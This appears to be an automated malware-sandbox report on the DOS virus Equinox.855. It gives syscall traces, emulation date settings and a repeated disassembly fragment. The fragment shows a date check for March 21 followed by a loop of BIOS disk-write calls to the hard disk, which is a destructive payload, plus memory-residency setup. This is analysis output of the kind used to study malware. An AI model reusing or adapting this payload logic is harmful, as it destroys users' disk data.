Sample viewer

vx.netlux.org/Virus.DOS.Equinox.855

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:16.821732683Z 72 PC: 13c5a | Allocate memory
2018-12-17T22:51:16.824544046Z 42 PC: 13c80 | Get date 0x13c80: cmp dx, 0x315
0x13c84: jne 0x13c98
0x13c86: mov cx, 3
0x13c89: push cx
0x13c8a: mov ax, 0x301
0x13c8d: mov dx, 0x80
0x13c90: mov cx, 1
0x13c93: int 0x13
0x13c95: pop cx
0x13c96: loop 0x13c89
0x13c98: xor ax, ax
0x13c9a: mov ds, ax
0x13c9c: mov bx, 0x184
0x13c9f: cmp word ptr [bx], 0x13
0x13ca2: je 0x13d1d
0x13ca4: int 0x12
0x13ca6: dec ax
0x13ca7: dec ax
0x13ca8: mov cl, 6
0x13caa: shl ax, cl
2018-12-17T22:51:16.827179666Z 53 PC: 13d0e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:51:16.828548438Z 37 PC: 13d1d | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10506,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:13.602272354Z 72 PC: 13c5a | Allocate memory
2018-12-25T12:28:13.605125049Z 42 PC: 13c80 | Get date 0x13c80: cmp dx, 0x315
0x13c84: jne 0x13c98
0x13c86: mov cx, 3
0x13c89: push cx
0x13c8a: mov ax, 0x301
0x13c8d: mov dx, 0x80
0x13c90: mov cx, 1
0x13c93: int 0x13
0x13c95: pop cx
0x13c96: loop 0x13c89
0x13c98: xor ax, ax
0x13c9a: mov ds, ax
0x13c9c: mov bx, 0x184
0x13c9f: cmp word ptr [bx], 0x13
0x13ca2: je 0x13d1d
0x13ca4: int 0x12
0x13ca6: dec ax
0x13ca7: dec ax
0x13ca8: mov cl, 6
0x13caa: shl ax, cl
2018-12-25T12:28:13.607435022Z 53 PC: 13d0e | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:13.608518432Z 37 PC: 13d1d | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":21,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10506,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:13.664742198Z 72 PC: 13c5a | Allocate memory
2018-12-25T12:28:13.6714318Z 42 PC: 13c80 | Get date 0x13c80: cmp dx, 0x315
0x13c84: jne 0x13c98
0x13c86: mov cx, 3
0x13c89: push cx
0x13c8a: mov ax, 0x301
0x13c8d: mov dx, 0x80
0x13c90: mov cx, 1
0x13c93: int 0x13
0x13c95: pop cx
0x13c96: loop 0x13c89
0x13c98: xor ax, ax
0x13c9a: mov ds, ax
0x13c9c: mov bx, 0x184
0x13c9f: cmp word ptr [bx], 0x13
0x13ca2: je 0x13d1d
0x13ca4: int 0x12
0x13ca6: dec ax
0x13ca7: dec ax
0x13ca8: mov cl, 6
0x13caa: shl ax, cl
2018-12-25T12:28:14.007911894Z 53 PC: 13d0e | Get interrupt vector (Interrupt = '33' AKA 'Random read')